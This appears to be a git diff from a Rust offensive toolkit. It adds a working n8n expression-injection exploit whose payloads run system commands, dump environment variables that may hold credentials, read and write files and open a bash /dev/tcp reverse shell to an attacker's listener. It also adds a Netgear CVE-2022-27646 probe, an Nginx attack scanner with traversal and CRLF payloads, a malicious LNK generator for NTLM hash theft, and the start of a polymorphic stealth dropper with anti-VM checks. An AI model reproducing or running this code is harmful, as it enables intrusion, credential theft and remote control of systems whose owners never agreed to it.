/// Authenticate to n8n and obtain access token
async fn authenticate(&mut self, email: &str, password: &str) -> Result<bool> {
println!("{}", "[*] Attempting authentication...".cyan());
let login_url = format!("{}/rest/login", self.base_url);
let login_data = json!({
"emailOrLdapLoginId": email,
"password": password
});
let response = self
.client
.post(&login_url)
.json(&login_data)
.send()
.await
.context("Failed to send login request")?;
if response.status().is_success() {
// Extract n8n-auth cookie value before consuming response (avoid borrow issues)
let n8n_auth_cookie: Option<String> = response
.cookies()
.find(|c| c.name() == "n8n-auth")
.map(|c| c.value().to_string());
// Try to extract token from response body
let text = response.text().await.unwrap_or_default();
if let Ok(data) = serde_json::from_str::<LoginResponse>(&text) {
// Check nested data.apiKey first
if let Some(ref d) = data.data {
if let Some(ref key) = d.api_key {
self.token = Some(key.clone());
}
}
// Check top-level apiKey
if self.token.is_none() {
if let Some(ref key) = data.api_key {
self.token = Some(key.clone());
}
}
}
// Fallback: Check for n8n-auth cookie (some versions use cookie-based auth)
if self.token.is_none() {
if let Some(cookie_value) = n8n_auth_cookie {
self.token = Some(cookie_value);
println!(
"{}",
"[+] Authentication successful (using n8n-auth cookie)".green()
);
return Ok(true);
} else {
// No token found in response and no n8n-auth cookie
println!(
"{}",
"[!] Login successful but no token or auth cookie found".yellow()
);
return Ok(false);
}
}
// Token found in response
let token_preview = self.token.as_ref().map(|t| {
if t.len() > 20 {
format!("{}...", &t[..20])
} else {
t.clone()
}
}).unwrap_or_default();
println!(
"{}",
format!("[+] Authentication successful! Token: {}", token_preview).green()
);
return Ok(true);
}
println!(
"{}",
format!("[-] Authentication failed: {}", response.status()).red()
);
Ok(false)
}
/// Build request with authentication headers
fn build_request(&self, method: reqwest::Method, url: &str) -> reqwest::RequestBuilder {
let mut req = self.client.request(method, url);
if let Some(ref token) = self.token {
req = req.header("Authorization", format!("Bearer {}", token));
}
req = req.header("Content-Type", "application/json");
req
}
/// Create a malicious workflow with expression injection payload
async fn create_malicious_workflow(
&self,
payload_expression: &str,
workflow_name: &str,
) -> Result<Option<String>> {
println!(
"{}",
format!("[*] Creating workflow: {}", workflow_name).cyan()
);
let workflow_url = format!("{}/rest/workflows", self.base_url);
// Build malicious workflow with expression injection in Set node
let workflow_data = json!({
"name": workflow_name,
"nodes": [
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": format!("={{{}}}", payload_expression)
}
]
},
"options": {}
},
"name": "Set",
"type": "n8n-nodes-base.set",
"typeVersion": 2,
"position": [250, 300],
"id": "exploit-node-1"
}
],
"connections": {},
"active": false,
"settings": {},
"tags": []
});
let response = self
.build_request(reqwest::Method::POST, &workflow_url)
.json(&workflow_data)
.send()
.await
.context("Failed to create workflow")?;
if response.status().is_success() {
let text = response.text().await.unwrap_or_default();
if let Ok(data) = serde_json::from_str::<WorkflowResponse>(&text) {
let workflow_id = data.id.or_else(|| data.data.and_then(|d| d.id));
if let Some(ref id) = workflow_id {
println!(
"{}",
format!("[+] Workflow created successfully! ID: {}", id).green()
);
return Ok(workflow_id);
}
}
// Try to extract ID from raw JSON
if let Ok(v) = serde_json::from_str::<Value>(&text) {
if let Some(id) = v.get("id").and_then(|v| v.as_str()) {
println!(
"{}",
format!("[+] Workflow created successfully! ID: {}", id).green()
);
return Ok(Some(id.to_string()));
}
}
println!("{}", "[-] Failed to extract workflow ID from response".red());
return Ok(None);
}
println!(
"{}",
format!("[-] Failed to create workflow: {}", response.status()).red()
);
Ok(None)
}
/// Execute the malicious workflow
async fn execute_workflow(&self, workflow_id: &str) -> Result<Option<Value>> {
println!(
"{}",
format!("[*] Executing workflow: {}", workflow_id).cyan()
);
let execute_url = format!("{}/rest/workflows/{}/run", self.base_url, workflow_id);
let response = self
.build_request(reqwest::Method::POST, &execute_url)
.json(&json!({}))
.send()
.await
.context("Failed to execute workflow")?;
if response.status().is_success() {
let text = response.text().await.unwrap_or_default();
println!("{}", "[+] Workflow executed successfully!".green());
if let Ok(result) = serde_json::from_str::<Value>(&text) {
return Ok(Some(result));
}
return Ok(Some(Value::String(text)));
}
println!(
"{}",
format!("[-] Failed to execute workflow: {}", response.status()).red()
);
Ok(None)
}
/// Delete the test workflow
async fn cleanup_workflow(&self, workflow_id: &str) {
println!(
"{}",
format!("[*] Cleaning up workflow: {}", workflow_id).cyan()
);
let delete_url = format!("{}/rest/workflows/{}", self.base_url, workflow_id);
match self
.build_request(reqwest::Method::DELETE, &delete_url)
.send()
.await
{
Ok(resp) => {
if resp.status().is_success() {
println!("{}", "[+] Workflow deleted successfully".green());
} else {
println!(
"{}",
format!("[!] Failed to delete workflow: {}", resp.status()).yellow()
);
}
}
Err(e) => {
println!(
"{}",
format!("[!] Error deleting workflow: {}", e).yellow()
);
}
}
}
/// Payload: Gather system information
async fn exploit_info(&self) -> Result<bool> {
println!("{}", "\n=== INFORMATION GATHERING ===".cyan().bold());
let payload = r#"this.constructor.constructor('return JSON.stringify({platform: process.platform, arch: process.arch, version: process.version, cwd: process.cwd(), user: process.env.USER || process.env.USERNAME})')()"#;
let workflow_id = match self.create_malicious_workflow(payload, "info-gathering").await? {
Some(id) => id,
None => return Ok(false),
};
tokio::time::sleep(Duration::from_secs(2)).await;
let result = self.execute_workflow(&workflow_id).await?;
if let Some(data) = result {
println!("{}", "\n[+] System Information:".green());
println!("{}", serde_json::to_string_pretty(&data).unwrap_or_default());
}
self.cleanup_workflow(&workflow_id).await;
Ok(true)
}
/// Payload: Execute arbitrary system command
async fn exploit_command(&self, command: &str) -> Result<bool> {
println!(
"{}",
format!("\n=== COMMAND EXECUTION: {} ===", command).cyan().bold()
);
// Escape quotes in command
let escaped_cmd = command.replace('"', "\\\"");
let payload = format!(
r#"this.constructor.constructor('return require("child_process").execSync("{}").toString()')()"#,
escaped_cmd
);
let workflow_id = match self.create_malicious_workflow(&payload, "cmd-exec").await? {
Some(id) => id,
None => return Ok(false),
};
tokio::time::sleep(Duration::from_secs(2)).await;
let result = self.execute_workflow(&workflow_id).await?;
if let Some(data) = result {
println!("{}", "\n[+] Command Output:".green());
println!("{}", serde_json::to_string_pretty(&data).unwrap_or_default());
}
self.cleanup_workflow(&workflow_id).await;
Ok(true)
}
/// Payload: Extract environment variables
async fn exploit_env(&self) -> Result<bool> {
println!(
"{}",
"\n=== EXTRACTING ENVIRONMENT VARIABLES ===".cyan().bold()
);
let payload = r#"this.constructor.constructor('return JSON.stringify(process.env, null, 2)')()"#;
let workflow_id = match self.create_malicious_workflow(payload, "env-extract").await? {
Some(id) => id,
None => return Ok(false),
};
tokio::time::sleep(Duration::from_secs(2)).await;
let result = self.execute_workflow(&workflow_id).await?;
if let Some(data) = result {
println!(
"{}",
"\n[+] Environment Variables (may contain credentials):".green()
);
println!("{}", serde_json::to_string_pretty(&data).unwrap_or_default());
}
self.cleanup_workflow(&workflow_id).await;
Ok(true)
}
/// Payload: Read file from filesystem
async fn exploit_read_file(&self, filepath: &str) -> Result<bool> {
println!(
"{}",
format!("\n=== READING FILE: {} ===", filepath).cyan().bold()
);
let escaped_path = filepath.replace('"', "\\\"");
let payload = format!(
r#"this.constructor.constructor('return require("fs").readFileSync("{}", "utf-8")')()"#,
escaped_path
);
let workflow_id = match self.create_malicious_workflow(&payload, "file-read").await? {
Some(id) => id,
None => return Ok(false),
};
tokio::time::sleep(Duration::from_secs(2)).await;
let result = self.execute_workflow(&workflow_id).await?;
if let Some(data) = result {
println!("{}", format!("\n[+] File Contents ({}):", filepath).green());
println!("{}", serde_json::to_string_pretty(&data).unwrap_or_default());
}
self.cleanup_workflow(&workflow_id).await;
Ok(true)
}
/// Payload: Write file to filesystem
async fn exploit_write_file(&self, filepath: &str, content: &str) -> Result<bool> {
println!(
"{}",
format!("\n=== WRITING FILE: {} ===", filepath).cyan().bold()
);
let escaped_path = filepath.replace('"', "\\\"");
let escaped_content = content.replace('"', "\\\"").replace('\n', "\\n");
let payload = format!(
r#"this.constructor.constructor('return require("fs").writeFileSync("{}", "{}")')()"#,
escaped_path, escaped_content
);
let workflow_id = match self.create_malicious_workflow(&payload, "file-write").await? {
Some(id) => id,
None => return Ok(false),
};
tokio::time::sleep(Duration::from_secs(2)).await;
let result = self.execute_workflow(&workflow_id).await?;
if result.is_some() {
println!(
"{}",
format!("[+] File written successfully: {}", filepath).green()
);
}
self.cleanup_workflow(&workflow_id).await;
Ok(true)
}
/// Payload: Establish reverse shell
async fn exploit_reverse_shell(&self, lhost: &str, lport: u16) -> Result<bool> {
println!(
"{}",
format!("\n=== REVERSE SHELL: {}:{} ===", lhost, lport)
.cyan()
.bold()
);
println!(
"{}",
format!("[!] Make sure you have a listener running: nc -lvnp {}", lport)
.yellow()
.bold()
);
let shell_cmd = format!("bash -i >& /dev/tcp/{}/{} 0>&1", lhost, lport);
let payload = format!(
r#"this.constructor.constructor('return require("child_process").exec("{}")')()"#,
shell_cmd
);
let workflow_id = match self.create_malicious_workflow(&payload, "revshell").await? {
Some(id) => id,
None => return Ok(false),
};
println!("{}", "[*] Triggering reverse shell...".cyan());
tokio::time::sleep(Duration::from_secs(2)).await;
let _ = self.execute_workflow(&workflow_id).await?;
println!(
"{}",
"[+] Reverse shell triggered! Check your listener.".green()
);
tokio::time::sleep(Duration::from_secs(5)).await;
self.cleanup_workflow(&workflow_id).await;
Ok(true)
}
}
// Local prompt removed
pub async fn run(target: &str) -> Result<()> {
display_banner();
println!("{}", format!("[*] Target: {}", target).yellow());
println!();
// Get credentials
println!("{}", "[*] n8n Authentication Required".cyan());
let email = prompt_input("Email: ")?;
let password = prompt_input("Password: ")?;
if email.is_empty() || password.is_empty() {
return Err(anyhow!("Email and password are required"));
}
// Initialize client and authenticate
let mut client = N8nClient::new(target)?;
if !client.authenticate(&email, &password).await? {
return Err(anyhow!("Authentication failed"));
}
println!();
println!("{}", "[*] Select payload:".cyan());
println!(" {} Gather system information", "1.".bold());
println!(" {} Execute command", "2.".bold());
println!(" {} Extract environment variables", "3.".bold());
println!(" {} Read file", "4.".bold());
println!(" {} Write file", "5.".bold());
println!(" {} Reverse shell", "6.".bold());
println!();
let choice = prompt_input("Select option [1-6]: ")?;
let success = match choice.as_str() {
"1" => client.exploit_info().await?,
"2" => {
let cmd = prompt_input("Enter command to execute: ")?;
if cmd.is_empty() {
return Err(anyhow!("Command cannot be empty"));
}
client.exploit_command(&cmd).await?
}
"3" => client.exploit_env().await?,
"4" => {
let filepath = prompt_input("Enter file path to read: ")?;
if filepath.is_empty() {
return Err(anyhow!("File path cannot be empty"));
}
client.exploit_read_file(&filepath).await?
}
"5" => {
let filepath = prompt_input("Enter file path to write: ")?;
let content = prompt_input("Enter content to write: ")?;
if filepath.is_empty() {
return Err(anyhow!("File path cannot be empty"));
}
client.exploit_write_file(&filepath, &content).await?
}
"6" => {
let lhost = prompt_input("Enter your listener IP (LHOST): ")?;
let lport_str = prompt_input("Enter your listener port (LPORT): ")?;
let lport: u16 = lport_str
.parse()
.map_err(|_| anyhow!("Invalid port number"))?;
if lhost.is_empty() {
return Err(anyhow!("LHOST cannot be empty"));
}
client.exploit_reverse_shell(&lhost, lport).await?
}
_ => {
println!("{}", "[-] Invalid option".red());
return Ok(());
}
};
println!();
if success {
println!("{}", "[+] Exploitation completed successfully!".green().bold());
println!(
"{}",
"[!] REMINDER: This is for authorized testing only.".yellow()
);
} else {
println!("{}", "[-] Exploitation failed".red());
}
Ok(())
}
+1
View File
@@ -0,0 +1 @@
pub mod netgear_r6700v3_rce_cve_2022_27646;
@@ -0,0 +1,91 @@
use anyhow::Result;
use colored::*;
use tokio::net::TcpStream;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target, prompt_default};
/// Netgear R6700v3 Pre-Auth RCE via Circled Daemon (CVE-2022-27646)
///
/// Exploits a buffer overflow in `/bin/circled` when fetching `circleinfo.txt`.
/// This is a WAN-side pre-authentication vulnerability.
///
/// Based on Pwn2Own Austin 2021 exploit by Synacktiv.
/// Target: TCP port 8888/8889/8890 (circled daemon)
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// Circled listens on ports 8888, 8889, 8890
let port_str = prompt_default("Target port (8888/8889/8890)", "8888")?;
let port: u16 = port_str.parse().unwrap_or(8888);
let target_addr = format!("{}:{}", target_ip, port);
println!("{} Target: {}", "[*]".blue(), target_addr);
println!("{} Checking if circled daemon is accessible...", "[*]".blue());
// Try to connect to the circled daemon
let connect_result = tokio::time::timeout(
Duration::from_secs(10),
TcpStream::connect(&target_addr)
).await;
match connect_result {
Ok(Ok(mut stream)) => {
println!("{} Connected to circled daemon!", "[+]".green());
// The vulnerability is triggered when circled fetches circleinfo.txt
// from a malicious server. For detection, we check if the port is open
// and potentially responsive.
// Send a probe to see if it responds
let probe = b"GET / HTTP/1.0\r\n\r\n";
if let Err(e) = stream.write_all(probe).await {
println!("{} Write failed: {} (daemon may be unresponsive)", "[*]".yellow(), e);
}
let mut buf = vec![0u8; 512];
match tokio::time::timeout(Duration::from_secs(5), stream.read(&mut buf)).await {
Ok(Ok(n)) if n > 0 => {
let response = String::from_utf8_lossy(&buf[..n]);
println!("{} Response: {}", "[*]".blue(), response.chars().take(100).collect::<String>());
},
_ => {
println!("{} No response (expected - circled uses binary protocol)", "[*]".yellow());
}
}
println!();
println!("{} Port {} is open - circled may be running!", "[VULN]".red().bold(), port);
println!("{} Full exploitation requires:", "[*]".cyan());
println!(" 1. Set up a malicious web server hosting poisoned circleinfo.txt");
println!(" 2. Perform DNS poisoning or MITM to redirect circle.meetcircle.co");
println!(" 3. Trigger the buffer overflow via crafted circleinfo.txt");
println!();
println!("{} Reference: github.com/synacktiv/Netgear_Pwn2Own2021", "[*]".dimmed());
},
Ok(Err(e)) => {
println!("{} Connection failed: {}", "[-]".red(), e);
println!("{} Circled daemon may not be running or port is filtered.", "[*]".yellow());
},
Err(_) => {
println!("{} Connection timed out.", "[-]".red());
}
}
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Netgear R6700v3 Pre-Auth RCE (CVE-2022-27646) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
+1
View File
@@ -0,0 +1 @@
pub mod nginx_pwner;
+360
View File
@@ -0,0 +1,360 @@
use anyhow::{Context, Result};
use colored::*;
use reqwest::{Client, StatusCode};
use std::fs::File;
use std::io::Write;
use std::time::Duration;
/// NginxPwner Exploit Suite
///
/// Ports functionality from https://github.com/stark0de/nginxpwner
/// Checks for common Nginx misconfigurations and vulnerabilities.
pub async fn run(target: &str) -> Result<()> {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ NginxPwner Exploit Suite ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!("{}", format!("[*] Target: {}", target).yellow());
// Normalize target
let target_url = crate::utils::normalize_target(target)?;
// Ensure no trailing slash for consistency in string building
let base_url = target_url.trim_end_matches('/');
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(10))
.redirect(reqwest::redirect::Policy::none()) // We want to inspect redirects manually sometimes
.build()
.context("Failed to build HTTP client")?;
let mut findings = Vec::new();
println!("{}", "[*] Starting scan...".cyan());
// 1. Version Check
check_version(&client, base_url, &mut findings).await;
// 2. CRLF Injection
check_crlf(&client, base_url, &mut findings).await;
// 3. PURGE Method
check_purge(&client, base_url, &mut findings).await;
// 4. Variable Leakage
check_variable_leak(&client, base_url, &mut findings).await;
// 5. Merge Slashes / Path Traversal
check_merge_slashes(&client, base_url, &mut findings).await;
// 6. Hop-by-Hop Header Bypass (IP Spoofing)
check_headers_bypass(&client, base_url, &mut findings).await;
// 7. CVE-2017-7529 (Integer Overflow)
check_integer_overflow(&client, base_url, &mut findings).await;
// 8. Alias Traversal (Kyubi logic)
check_alias_traversal(&client, base_url, &mut findings).await;
// 9. PHP Detection
check_php(&client, base_url, &mut findings).await;
// 10. X-Accel-Redirect Bypass
check_x_accel_redirect(&client, base_url, &mut findings).await;
// 11. Raw Backend Reading & Source Disclosure
check_raw_backend_reading(&client, base_url, &mut findings).await;
// 12. Manual Check Suggestions (Redis, etc)
print_manual_suggestions();
// Report Findings
println!("\n{}", "═══ Scan Results ═══".cyan().bold());
if findings.is_empty() {
println!("{}", "No significant vulnerabilities found.".green());
} else {
for finding in &findings {
println!("{}", finding);
}
// Save to file
save_results(target, &findings)?;
}
Ok(())
}
async fn check_version(client: &Client, url: &str, findings: &mut Vec<String>) {
if let Ok(resp) = client.get(url).send().await {
if let Some(server) = resp.headers().get("Server") {
if let Ok(s) = server.to_str() {
println!("[*] Server Header: {}", s.blue());
if s.contains('/') && s.chars().any(|c| c.is_numeric()) {
findings.push(format!("Version Disclosure: Server header reveals version '{}'. Check if outdated.", s));
}
}
}
}
}
async fn check_crlf(client: &Client, url: &str, findings: &mut Vec<String>) {
let payload = "%0d%0aDetectify:%20crlf";
let target = format!("{}/{}", url, payload);
if let Ok(resp) = client.get(&target).send().await {
if resp.headers().contains_key("Detectify") {
let msg = format!("CRLF Injection found! URI: {} reflects 'Detectify' header.", target);
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
}
}
}
async fn check_purge(client: &Client, url: &str, findings: &mut Vec<String>) {
let target = format!("{}/test_purge", url);
if let Ok(resp) = client.request(reqwest::Method::from_bytes(b"PURGE").expect("Valid method bytes"), &target).send().await {
if resp.status().as_u16() == 204 {
let msg = format!("PURGE method is enabled on {}. This might allow cache poisoning/clearing.", target);
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
}
}
}
async fn check_variable_leak(client: &Client, url: &str, findings: &mut Vec<String>) {
let target = format!("{}/foo$http_referer", url);
let secret = "RUSTSPLOIT_SECRET_REF";
if let Ok(resp) = client.get(&target).header("Referer", secret).send().await {
if let Ok(text) = resp.text().await {
if text.contains(secret) {
let msg = format!("Variable Leakage: '$http_referer' is reflected in response from {}", target);
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
}
}
}
}
async fn check_merge_slashes(client: &Client, url: &str, findings: &mut Vec<String>) {
// Check path traversal via merge_slashes bypass
let payloads = vec![
"///../../../../../etc/passwd",
"//////../../../../../../etc/passwd",
"///../../../../../win.ini",
];
for p in payloads {
let target = format!("{}{}", url, p);
if let Ok(resp) = client.get(&target).send().await {
if resp.status() == StatusCode::OK {
let msg = format!("Possible Path Traversal via merge_slashes bypass: {}", target);
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
break;
}
}
}
}
async fn check_headers_bypass(client: &Client, url: &str, findings: &mut Vec<String>) {
let headers_list = vec![
"X-Forwarded-For", "X-Real-IP", "X-Originating-IP", "Client-IP", "X-Client-IP",
"Proxy-Host", "X-Forwarded", "X-Forwarded-By", "X-Forwarded-Host", "Base-Url", "Http-Url"
];
let ips = vec!["127.0.0.1", "localhost", "192.168.1.1", "10.0.0.1"];
let baseline = client.get(format!("{}/", url)).send().await;
let baseline_len = match baseline {
Ok(ref r) => r.content_length().unwrap_or(0),
Err(_) => return,
};
let baseline_status = match baseline {
Ok(ref r) => r.status(),
Err(_) => return,
};
for header in headers_list {
for ip in &ips {
if let Ok(resp) = client.get(format!("{}/", url)).header(header, *ip).send().await {
let len = resp.content_length().unwrap_or(0);
if resp.status() != baseline_status || (len as i64 - baseline_len as i64).abs() > 50 {
let msg = format!("Response difference detected with header {}: {}. Possible IP restriction bypass.", header, ip);
println!("{}", format!("[?] {}", msg).yellow());
findings.push(msg);
}
}
}
}
}
async fn check_integer_overflow(client: &Client, url: &str, findings: &mut Vec<String>) {
if let Ok(resp) = client.get(url).send().await {
let content_len = resp.content_length().unwrap_or(0);
if content_len > 0 {
let bytes_len = content_len + 623;
let range_val = format!("bytes=-{},-9223372036854{}", bytes_len, 776000 - (bytes_len as i64));
if let Ok(vuln_resp) = client.get(url).header("Range", range_val).send().await {
if vuln_resp.status() == StatusCode::PARTIAL_CONTENT || vuln_resp.headers().contains_key("Content-Range") {
let msg = format!("Vulnerable to CVE-2017-7529 (Integer Overflow). Target: {}", url);
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
}
}
}
}
}
async fn check_alias_traversal(client: &Client, url: &str, findings: &mut Vec<String>) {
// "Off-by-slash" alias traversal
// We try common static paths and paths often found in Nginx configs.
let paths = vec![
"static", "assets", "img", "images", "js", "css", "media", "uploads", "icons", "public",
"conf", "backup", "db", "database", "admin", "private", "api", "download", "files"
];
for path in paths {
let traversal = format!("{}{}../", url, path);
if let Ok(resp) = client.get(&traversal).send().await {
if resp.status() == StatusCode::FORBIDDEN || resp.status() == StatusCode::OK {
// Eliminate false positives by comparing with 404
let garbage = format!("{}/garbage_{}", url, path);
let r404 = client.get(&garbage).send().await;
let r404_status = r404.map(|r| r.status()).unwrap_or(StatusCode::NOT_FOUND);
if resp.status() != r404_status {
let msg = format!("Possible Alias Traversal key found at: {}. Status: {}", traversal, resp.status());
println!("{}", format!("[?] {}", msg).yellow());
findings.push(msg);
}
}
}
}
}
async fn check_raw_backend_reading(client: &Client, url: &str, findings: &mut Vec<String>) {
// Test for Raw Backend Reading via specific verb/header
// Python script suggests: GET /? XTTP/1.1\nHost: 127.0.0.1\nConnection: close
// We try to look for Nginx Status or Source Disclosure as a proxy for this class of misconfig coverage.
// Check for Nginx Status
let status_paths = vec!["nginx_status", "stub_status", "status", "nginx-status"];
for p in status_paths {
if let Ok(resp) = client.get(format!("{}/{}", url, p)).send().await {
if resp.status() == StatusCode::OK {
if let Ok(text) = resp.text().await {
if text.contains("Active connections") || text.contains("server accepts handled requests") {
let msg = format!("Nginx Status information found at {}/{}", url, p);
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
}
}
}
}
}
// Check if root reveals nginx.conf (Source Disclosure)
if let Ok(resp) = client.get(format!("{}/", url)).send().await {
if let Ok(text) = resp.text().await {
if text.contains("worker_processes") && text.contains("http {") {
let msg = format!("Root directory reveals nginx.conf content! Missing root directive?");
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
}
}
}
}
async fn check_php(client: &Client, url: &str, findings: &mut Vec<String>) {
let mut is_php = false;
// Check 1: /index.php
if let Ok(resp) = client.get(format!("{}/index.php", url)).send().await {
if resp.status() == StatusCode::OK {
is_php = true;
}
}
// Check 2: Cookies and Headers
if let Ok(resp) = client.get(url).send().await {
if resp.headers().iter().any(|(k, v)| k == "set-cookie" && v.to_str().unwrap_or("").contains("PHPSESSID")) {
is_php = true;
}
if let Some(s) = resp.headers().get("Server") {
if s.to_str().unwrap_or("").to_lowercase().contains("php") {
is_php = true;
}
}
if let Some(x) = resp.headers().get("X-Powered-By") {
if x.to_str().unwrap_or("").to_lowercase().contains("php") {
is_php = true;
}
}
}
if is_php {
println!("{}", "[+] Target seems to be using PHP.".green());
findings.push("Technology Detection: PHP detected.".to_string());
println!("{}", "[?] If PHP is used, check for configuration errors: https://book.hacktricks.xyz/pentesting/pentesting-web/nginx#script_name".cyan());
println!("{}", "[?] Also check CVE-2019-11043.".cyan());
}
}
async fn check_x_accel_redirect(client: &Client, url: &str, findings: &mut Vec<String>) {
// We can't access "existingfolderpathlist" from logic easily as arg,
// so we use a common list of sensitive/likely protected paths to test bypass on.
let sensitive_paths = vec![
"admin", "private", "conf", "config", "backup", "db", "logs", "internal", "api", "console"
];
println!("{}", "[?] Testing X-Accel-Redirect bypass on common paths...".cyan());
for path in sensitive_paths {
let full_path = format!("{}/{}", url, path);
if let Ok(resp) = client.get(&full_path).send().await {
// If we get 401/403, we try to bypass
if resp.status() == StatusCode::FORBIDDEN || resp.status() == StatusCode::UNAUTHORIZED {
// Try X-Accel-Redirect
let bypass_header = format!("/{}", path);
let random_path = format!("{}/accel_bypass_test_rustsploit", url);
if let Ok(bypass) = client.get(&random_path).header("X-Accel-Redirect", bypass_header).send().await {
if bypass.status() != resp.status() && bypass.status().as_u16() < 400 {
let msg = format!("Possible X-Accel-Redirect bypass found! Path: {} returned {} directly, but {} with header.",
path, resp.status(), bypass.status());
println!("{}", format!("[!] {}", msg).red().bold());
findings.push(msg);
}
}
}
}
}
}
fn print_manual_suggestions() {
println!("\n{}", "[*] Manual Check Suggestions:".yellow().bold());
println!("{}", "1. Raw Backend Reading: Test with 'GET /? XTTP/1.1\\nHost: 127.0.0.1\\nConnection: close'".cyan());
println!("{}", "2. Redis: If site uses Redis, check for misconfigurations (see labs.detectify.com)".cyan());
println!("{}", "3. CORS: Check for bad regexes with Corsy.".cyan());
println!("{}", "4. Request Smuggling: Check for typical HTTP smuggling issues.".cyan());
}
fn save_results(target: &str, findings: &[String]) -> Result<()> {
// Sanitize target for filename
let safe_target = target.replace("http://", "").replace("https://", "").replace("/", "_").replace(":", "_");
let filename = format!("nginx_pwner_results_{}.txt", safe_target);
let mut file = File::create(&filename).context("Failed to create result file")?;
writeln!(file, "NginxPwner Scan Results for {}", target)?;
writeln!(file, "Timestamp: {}", chrono::Local::now())?;
writeln!(file, "----------------------------------------")?;
for f in findings {
writeln!(file, "{}", f)?;
}
println!("\n[+] Results saved to {}", filename.green());
Ok(())
}
@@ -29,11 +29,10 @@
use anyhow::{Context, Result};
use colored::*;
use crate::utils::validate_file_path;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use reqwest::Client;
use std::{
fs::File,
io::{BufRead, BufReader},
io::{BufRead, BufReader, Write},
process::Command,
time::Duration,
};
@@ -270,13 +269,11 @@ pub async fn run(target: &str) -> Result<()> {
let mut port_input = String::new();
print!("{}", format!("Enter target port (default {}): ", default_port).cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut port_input)
.await
.context("Failed to read port input")?;
let port: u16 = port_input.trim().parse().unwrap_or(default_port);
+4 -5
View File
@@ -5,21 +5,20 @@ use rand::{seq::SliceRandom, rng};
use std::{
fs,
path::Path,
io::Write,
};
use base64::{engine::general_purpose::STANDARD as BASE64_STANDARD, Engine as _};
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
async fn prompt(prompt: &str) -> Result<String> {
print!("{}", prompt.cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut buffer = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut buffer)
.await
.context("Failed to read input")?;
Ok(buffer.trim().to_string())
}
+7 -24
View File
@@ -6,7 +6,7 @@ use std::{
io::Write,
path::Path,
};
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
/// Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure (CVE-2025-50154, CVE-2025-59214)
///
@@ -32,14 +32,12 @@ const BANNER: &str = r#"
async fn prompt(prompt: &str) -> Result<String> {
print!("{}", prompt.cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut buffer = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut buffer)
.await
.context("Failed to read input")?;
Ok(buffer.trim().to_string())
}
@@ -60,25 +58,10 @@ fn create_malicious_lnk(output_path: &Path, smb_ip: &str, smb_share: &str, smb_f
// For cross-platform compatibility, we'll try to use the Windows API if available
// Otherwise, create a minimal LNK structure that should work
#[cfg(target_os = "windows")]
{
// On Windows, try to use Windows APIs to create the shortcut properly
use std::os::windows::ffi::OsStrExt;
use std::ffi::OsStr;
// Try to create using IShellLink interface if possible
// For now, fall back to manual LNK creation
return create_lnk_manual(output_path, &target_file, &icon_location);
}
#[cfg(not(target_os = "windows"))]
{
// On non-Windows platforms, create a basic LNK structure
// This won't be perfect but demonstrates the concept
return create_lnk_manual(output_path, &target_file, &icon_location);
}
#[allow(unreachable_code)]
// We use manual LNK creation ensures we generate the exact structure needed
// for this exploit (local icon + remote target) regardless of the host OS.
// Using Windows APIs (IShellLink) might attempt to resolve the target path,
// which we specifically want to avoid until the victim clicks it.
create_lnk_manual(output_path, &target_file, &icon_location)
}
+1
View File
@@ -2,3 +2,4 @@ pub mod narutto_dropper;
pub mod batgen;
pub mod lnkgen;
pub mod payload_encoder;
pub mod polymorph_dropper;
@@ -1,305 +1,349 @@
// == Poly-morphic, 3-Stage, Chain-Linked Stealth Dropper (Interactive, Hardened) ==
// // User provides: PS1 download link, final batch name, output .ps1 name
// // All temp/var names randomized, batch logic randomized, anti-VM checks
// == Poly-morphic, 3-Stage, Chain-Linked Stealth Dropper (Refactored) ==
// Supports LOLBAS (Certutil, Bitsadmin, PowerShell) and enhanced Anti-VM
use rand::prelude::*;
use anyhow::{Result, Context};
use colored::*;
use rand::{rng, seq::SliceRandom, Rng};
use rand::{rng, seq::SliceRandom, seq::IndexedRandom, Rng};
use std::collections::HashMap;
use std::io::Write;
use tokio::fs::File as TokioFile;
use tokio::io::{AsyncWriteExt, AsyncBufReadExt};
use tokio::io::AsyncWriteExt;
// // Prints a welcome message for the Naruto 3-stage poly-morphic dropper
pub fn print_welcome_naruto() {
println!(r#"
======================== WELCOME TO NARUTO ========================
// ==============================================================================
// Constants & Configuration
// ==============================================================================
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣤⣴⣶⣶⣶⣶⣦⣤⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⠀⠀⠀⠀⠀⠀
